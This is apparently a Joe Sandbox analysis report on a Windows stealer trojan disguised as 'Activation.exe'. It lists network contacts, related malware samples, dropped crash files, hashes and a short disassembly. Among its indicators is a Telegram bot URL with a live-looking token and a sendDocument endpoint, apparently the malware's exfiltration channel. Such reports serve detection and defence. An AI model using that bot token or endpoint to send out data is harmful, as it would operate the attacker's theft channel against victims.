                                                http://get.geojs.ioActivation.exe, 00000000.00000002.1654044812.00000000035C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://api.telegram.org/bot7772275304:AAF3OSvWBzn5cIHkGD9ueBFz5ed91u-60-U/sendDocumentdActivation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchActivation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://get.geojs.ioActivation.exe, 00000000.00000002.1654044812.0000000003471000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003514000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://api.telegram.orgdActivation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://get.geoj8Activation.exe, 00000000.00000002.1654044812.0000000003514000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://api.telegram.orgActivation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameActivation.exe, 00000000.00000002.1654044812.0000000003471000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://t.me/webster480Activation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003471000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.00000000034D2000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.000000000362C000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003514000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.000000000361E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  149.154.167.220
                                                                  api.telegram.orgUnited Kingdom
                                                                  62041TELEGRAMRUfalse
                                                                  104.26.1.100
                                                                  get.geojs.ioUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1568338
                                                                  Start date and time:2024-12-04 15:10:51 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 4m 56s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:10
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:Activation.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@2/5@2/2
                                                                  EGA Information:Failed
                                                                  HCA Information:
                                                                  • Successful, ratio: 68%
                                                                  • Number of executed functions: 143
                                                                  • Number of non-executed functions: 5
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 104.208.16.94
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                                                                  • Execution Graph export aborted for target Activation.exe, PID 7588 because it is empty
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • VT rate limit hit for: Activation.exe
                                                                  TimeTypeDescription
                                                                  09:11:58API Interceptor34x Sleep call for process: Activation.exe modified
                                                                  09:12:11API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  149.154.167.220file.exeGet hashmaliciousAmadey, Discord Token Stealer, DotStealer, LummaC Stealer, Stealc, VidarBrowse
                                                                    nfkciRoR4j.exeGet hashmaliciousXmrigBrowse
                                                                      fiyati_teklif 65W20_ B#U00fcy#U00fck BID mokapto Sipari#U015fi jpeg docx _ .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        fiyati_teklif 65W20_ B#U00fcy#U00fck mokapto Sipari#U015fi jpeg docx _ .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                            file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                              Pagamento,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                https://www.bing.com/ck/a?!&&p=b3ddcc612c5f63024f18df0521265aa33742187d0b01744f07bf6348af8f753eJmltdHM9MTczMzE4NDAwMA&ptn=3&ver=2&hsh=4&fclid=26e9525e-8a77-6109-2437-46988be9608d&psq=superpitmachinery.com&u=a1aHR0cHM6Ly9zdXBlcnBpdG1hY2hpbmVyeS5jb20v&ntb/#fi-weixiang.ong@falconincorporation.comGet hashmaliciousUnknownBrowse
                                                                                  PAYMENT RECEIPT_pdf.com.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    fiyati_teklif 65W20_ B#U00fcy#U00fck mokapto Sipari#U015fi _PDF_.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      104.26.1.100install.exeGet hashmaliciousUnknownBrowse
                                                                                      • get.geojs.io/v1/ip/geo.json
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      get.geojs.ioZOL2mIYAUH.exeGet hashmaliciousPhemedrone Stealer, PureLog Stealer, XWorm, zgRATBrowse
                                                                                      • 104.26.0.100
                                                                                      WDSecureUtilities(1).exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                      • 104.26.1.100
                                                                                      system.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                      • 172.67.70.233
                                                                                      B6EGeOHEFm.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                      • 104.26.1.100
                                                                                      Q60ZbERXWZ.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                      • 104.26.1.100
                                                                                      nuVM6HVKRG.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                      • 104.26.1.100
                                                                                      XCubQJqiz7.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                      • 104.26.1.100
                                                                                      upd.ps1Get hashmaliciousPhemedrone StealerBrowse
                                                                                      • 172.67.70.233
                                                                                      WDSecureUtil.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                      • 104.26.1.100
                                                                                      DBp7mBJwqD.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                      • 172.67.70.233
                                                                                      s-part-0035.t-0009.t-msedge.netShellHelper32.dllGet hashmaliciousUnknownBrowse
                                                                                      • 13.107.246.63
                                                                                      ShellHelper32.dllGet hashmaliciousUnknownBrowse
                                                                                      • 13.107.246.63
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 13.107.246.63
                                                                                      VaXmr82RIb.exeGet hashmaliciousUnknownBrowse
                                                                                      • 13.107.246.63
                                                                                      QwLii5vouB.exeGet hashmaliciousUnknownBrowse
                                                                                      • 13.107.246.63
                                                                                      sF5nNt8usL.batGet hashmaliciousUnknownBrowse
                                                                                      • 13.107.246.63
                                                                                      oLY6JbNl9i.batGet hashmaliciousUnknownBrowse
                                                                                      • 13.107.246.63
                                                                                      B3N4x4meoJ.batGet hashmaliciousUnknownBrowse
                                                                                      • 13.107.246.63
                                                                                      Readme.lnk.download.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                      • 13.107.246.63
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 13.107.246.63
                                                                                      api.telegram.orgfile.exeGet hashmaliciousAmadey, Discord Token Stealer, DotStealer, LummaC Stealer, Stealc, VidarBrowse
                                                                                      • 149.154.167.220
                                                                                      fiyati_teklif 65W20_ B#U00fcy#U00fck BID mokapto Sipari#U015fi jpeg docx _ .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      fiyati_teklif 65W20_ B#U00fcy#U00fck mokapto Sipari#U015fi jpeg docx _ .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                      • 149.154.167.220
                                                                                      Pagamento,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      https://www.bing.com/ck/a?!&&p=b3ddcc612c5f63024f18df0521265aa33742187d0b01744f07bf6348af8f753eJmltdHM9MTczMzE4NDAwMA&ptn=3&ver=2&hsh=4&fclid=26e9525e-8a77-6109-2437-46988be9608d&psq=superpitmachinery.com&u=a1aHR0cHM6Ly9zdXBlcnBpdG1hY2hpbmVyeS5jb20v&ntb/#fi-weixiang.ong@falconincorporation.comGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      PAYMENT RECEIPT_pdf.com.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      fiyati_teklif 65W20_ B#U00fcy#U00fck mokapto Sipari#U015fi _PDF_.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      3GloGaDtsG.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      TELEGRAMRUfile.exeGet hashmaliciousAmadey, Discord Token Stealer, DotStealer, LummaC Stealer, Stealc, VidarBrowse
                                                                                      • 149.154.167.220
                                                                                      nfkciRoR4j.exeGet hashmaliciousXmrigBrowse
                                                                                      • 149.154.167.220
                                                                                      fiyati_teklif 65W20_ B#U00fcy#U00fck BID mokapto Sipari#U015fi jpeg docx _ .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      o26qobnkQI.exeGet hashmaliciousVidarBrowse
                                                                                      • 149.154.167.99
                                                                                      fiyati_teklif 65W20_ B#U00fcy#U00fck mokapto Sipari#U015fi jpeg docx _ .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      xoJxSAotVM.exeGet hashmaliciousVidarBrowse
                                                                                      • 149.154.167.99
                                                                                      Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                      • 149.154.167.220
                                                                                      Pagamento,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      https://www.bing.com/ck/a?!&&p=b3ddcc612c5f63024f18df0521265aa33742187d0b01744f07bf6348af8f753eJmltdHM9MTczMzE4NDAwMA&ptn=3&ver=2&hsh=4&fclid=26e9525e-8a77-6109-2437-46988be9608d&psq=superpitmachinery.com&u=a1aHR0cHM6Ly9zdXBlcnBpdG1hY2hpbmVyeS5jb20v&ntb/#fi-weixiang.ong@falconincorporation.comGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      CLOUDFLARENETUST05Dk6G8fg.exeGet hashmaliciousUnknownBrowse
                                                                                      • 104.16.184.241
                                                                                      Recent Services Delays Update.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                      • 104.17.247.203
                                                                                      wa6qrGANga.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 104.21.58.186
                                                                                      3K5MXGVOJE.exeGet hashmaliciousUnknownBrowse
                                                                                      • 104.16.185.241
                                                                                      https://www.aviatorsharkao.com.br/atuussGet hashmaliciousUnknownBrowse
                                                                                      • 104.21.43.244
                                                                                      file.exeGet hashmaliciousAmadey, Discord Token Stealer, DotStealer, LummaC Stealer, Stealc, VidarBrowse
                                                                                      • 172.67.181.44
                                                                                      RzLnOTy9k3.lnkGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.67.209.252
                                                                                      VaXmr82RIb.exeGet hashmaliciousUnknownBrowse
                                                                                      • 104.16.184.241
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.67.165.166
                                                                                      QsEn4Jw9pY.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 172.67.201.111
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousAmadey, Discord Token Stealer, DotStealer, LummaC Stealer, Stealc, VidarBrowse
                                                                                      • 104.26.1.100
                                                                                      • 149.154.167.220
                                                                                      RzLnOTy9k3.lnkGet hashmaliciousLummaC StealerBrowse
                                                                                      • 104.26.1.100
                                                                                      • 149.154.167.220
                                                                                      QwLii5vouB.exeGet hashmaliciousUnknownBrowse
                                                                                      • 104.26.1.100
                                                                                      • 149.154.167.220
                                                                                      https://cdn.tailwindcss.comGet hashmaliciousUnknownBrowse
                                                                                      • 104.26.1.100
                                                                                      • 149.154.167.220
                                                                                      fiyati_teklif 65W20_ B#U00fcy#U00fck BID mokapto Sipari#U015fi jpeg docx _ .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.26.1.100
                                                                                      • 149.154.167.220
                                                                                      oLY6JbNl9i.batGet hashmaliciousUnknownBrowse
                                                                                      • 104.26.1.100
                                                                                      • 149.154.167.220
                                                                                      4l5IFxl9t3.batGet hashmaliciousUnknownBrowse
                                                                                      • 104.26.1.100
                                                                                      • 149.154.167.220
                                                                                      Documenti di spedizione.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                      • 104.26.1.100
                                                                                      • 149.154.167.220
                                                                                      bestimylover.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                                      • 104.26.1.100
                                                                                      • 149.154.167.220
                                                                                      nicpeoplesideasgivenforme.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                                      • 104.26.1.100
                                                                                      • 149.154.167.220
                                                                                      No context
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):65536
                                                                                      Entropy (8bit):1.3050798073506145
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:B4Gjrrm+hf0BU/HnAjAHtdTJZrWyUzuiFEZ24IO8hM:jO+KBU/gjaiyUzuiFEY4IO8a
                                                                                      MD5:6D044524EFB8CDC983873C14407CA531
                                                                                      SHA1:12D8FC0151730D32AC7537EED8F8A0B228748134
                                                                                      SHA-256:2CA54490251FCEFCF1EAAC1722A47F9F2EECC3E61CB83B5F829E278815BC212A
                                                                                      SHA-512:9514980B26F8233DFBF453AA2EAB17FF6953BA10FCB1D265D31CC6C97B2780D67EEFDC4F0D529F1076AB2799F75A55CBAF232263106745E520CA10926F33D358
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.7.9.5.1.2.2.3.2.7.7.6.9.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.7.9.5.1.2.3.8.7.4.6.4.8.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.a.f.6.4.5.6.3.-.8.c.1.9.-.4.b.9.d.-.b.6.e.b.-.e.a.6.b.a.e.0.d.b.5.d.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.9.e.1.1.2.4.a.-.1.a.9.8.-.4.3.4.9.-.8.9.c.b.-.f.0.a.c.d.f.b.3.5.4.c.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.A.c.t.i.v.a.t.i.o.n...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.q.b.i.t.t.o.r.r.e.n.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.a.4.-.0.0.0.1.-.0.0.1.4.-.4.d.2.6.-.d.f.7.1.5.6.4.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.2.2.b.f.c.a.6.f.a.2.b.5.2.d.5.2.1.f.6.1.a.f.e.0.8.a.c.e.8.c.7.0.0.0.0.0.9.0.4.!.0.0.0.0.b.a.e.c.5.2.5.e.2.5.7.8.6.a.3.7.8.7.b.9.0.b.3.0.0.a.3.8.3.f.8.1.4.
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Mini DuMP crash report, 15 streams, Wed Dec 4 14:12:02 2024, 0x1205a4 type
                                                                                      Category:dropped
                                                                                      Size (bytes):372140
                                                                                      Entropy (8bit):3.4259766265083575
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:5mCWbknGY5yLys4H4uEqoSqhQbh12dLTgGZiEg1N:5GbqALy/H43U25TgGNq
                                                                                      MD5:D41C85C50955A6D2ED23CEDFC3145419
                                                                                      SHA1:A156638AEF5D2CCB6A17018FB5CDD05D498DE6C7
                                                                                      SHA-256:3BC82C62EB8F08DC70DAEE295C4D79CD5CEC1E7927A684AA6B6175210BD17151
                                                                                      SHA-512:2CFBA081A6D33641CF9B75E598FC2CC7C34222E9B899FA57196E9DA7B424CEC8A2DF4DFB77D7B592E8A17D3FC32130AA51558BDCF86EA3F62FCDC62AE167523F
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:MDMP..a..... .......2cPg.........................%..........<...h0.......-...y..........`.......8...........T...........`_..LN...........0...........2..............................................................................eJ......(3......GenuineIntel............T............cPg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):8418
                                                                                      Entropy (8bit):3.691742832374065
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:R6l7wVeJXt6D9Tbe6YcDNSU7XBGgmfZRpprp89b9rsfxzfm:R6lXJ96I6YKSU7wgmf/y9wfg
                                                                                      MD5:AB7434C43DF7B3490987D4FE9D50F529
                                                                                      SHA1:4BFD4E615248CE6AD7368A70EAD92EE8A8291D09
                                                                                      SHA-256:78EF32F957B094439ACF8AEFA1D22B324D9740A198539350AA5AB549D4B62D26
                                                                                      SHA-512:CF7AE35E26765D3477F4A599FDC24926D73850397A85805C2DF7D1E496ED8E2E322274D7CCB3B8BAC21B104F566439E2064467055C7C9149D70E5C5F981B0D19
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.8.8.<./.P.i.
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):4755
                                                                                      Entropy (8bit):4.45552039801645
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:cvIwWl8zsZOJg77aI9L/fQWpW8VYsYm8M4JM3Fc+q8vqXiKFq+d:uIjfKI7VB7V8JDKIiKFq+d
                                                                                      MD5:E98A4D0D4B24BDA2DC322AFFBD60EDCB
                                                                                      SHA1:B7D413646B38E2E02B3659F79CE885C292603A35
                                                                                      SHA-256:C342C35718E00945EE844F1AF06C2260E25C147BFCD2E1C98FF81770B77F1851
                                                                                      SHA-512:ED4A49F787A240BC69F1771B747D593067B60239628F1B11E5366527993D6369FA59A4F7B5E021B5F701361D22D2A6395EE2BF793D0058A8E07C34A25E784857
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="616634" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                      Category:dropped
                                                                                      Size (bytes):1835008
                                                                                      Entropy (8bit):4.394228956586081
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:fl4fiJoH0ncNXiUjt10q0G/gaocYGBoaUMMhA2NX4WABlBuN2ROBSqa:d4vF0MYQUMM6VFYgRU
                                                                                      MD5:46B577A39395722D5BFFEAA38E0FC189
                                                                                      SHA1:F9E5699AB892BBD75D0ECC71CE37E20DEA9035B3
                                                                                      SHA-256:E496CD4210B73BD36FC212B319CFEC1A2DC16456A3850E68F3A337D178C3EB5D
                                                                                      SHA-512:DAE1F6A56778B6CEDAE654EED4B1715269DC7B7B5BDEAE2E501810373AD42470E722B85B1A1DD8638E79AB0F3063926CDAE549EBF40C98BBBA558786499FDD69
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..Y}VF..............................................................................................................................................................................................................................................................................................................................................>.NI........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.958368471713319
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:Activation.exe
                                                                                      File size:3'361'979 bytes
                                                                                      MD5:aa3a94ba72728df41a815b060f5e9c52
                                                                                      SHA1:baec525e25786a3787b90b300a383f814e65377d
                                                                                      SHA256:573a6686dba8217e51b0c4fd9b041a4bf3ce193d6be69e201a6edcefa3dc42e6
                                                                                      SHA512:99772aa3f7837a205f1657730cafc93d8bdcd3cd3826669402f344db5ba28d48c84521dba2a7eab2e7a0c5b3b064fe8c364b9665d03253a94f6177565ef82962
                                                                                      SSDEEP:98304:Jj3eS6htWV1940j0wk0IySMGfEsiC0BDm+:0S67WVRjplgMJRVb
                                                                                      TLSH:0EF5337CE28C7EB0CAE559771662FCCCE3C978A1EE84F13AF98745234964D53346AA40
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z=Pg.........."...0.............X.V.. ........@.. .......................@......Ml3...`................................
                                                                                      Icon Hash:00928e8e8686b000
                                                                                      Entrypoint:0x96e058
                                                                                      Entrypoint Section:.boot
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x67503D7A [Wed Dec 4 11:31:06 2024 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:4328f7206db519cd4e82283211d98e83
                                                                                      Instruction
                                                                                      call 00007F6B40CD8D00h
                                                                                      push ebx
                                                                                      mov ebx, esp
                                                                                      push ebx
                                                                                      mov esi, dword ptr [ebx+08h]
                                                                                      mov edi, dword ptr [ebx+10h]
                                                                                      cld
                                                                                      mov dl, 80h
                                                                                      mov al, byte ptr [esi]
                                                                                      inc esi
                                                                                      mov byte ptr [edi], al
                                                                                      inc edi
                                                                                      mov ebx, 00000002h
                                                                                      add dl, dl
                                                                                      jne 00007F6B40CD8BB7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      jnc 00007F6B40CD8B9Ch
                                                                                      add dl, dl
                                                                                      jne 00007F6B40CD8BB7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      jnc 00007F6B40CD8C03h
                                                                                      xor eax, eax
                                                                                      add dl, dl
                                                                                      jne 00007F6B40CD8BB7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      jnc 00007F6B40CD8C97h
                                                                                      add dl, dl
                                                                                      jne 00007F6B40CD8BB7h
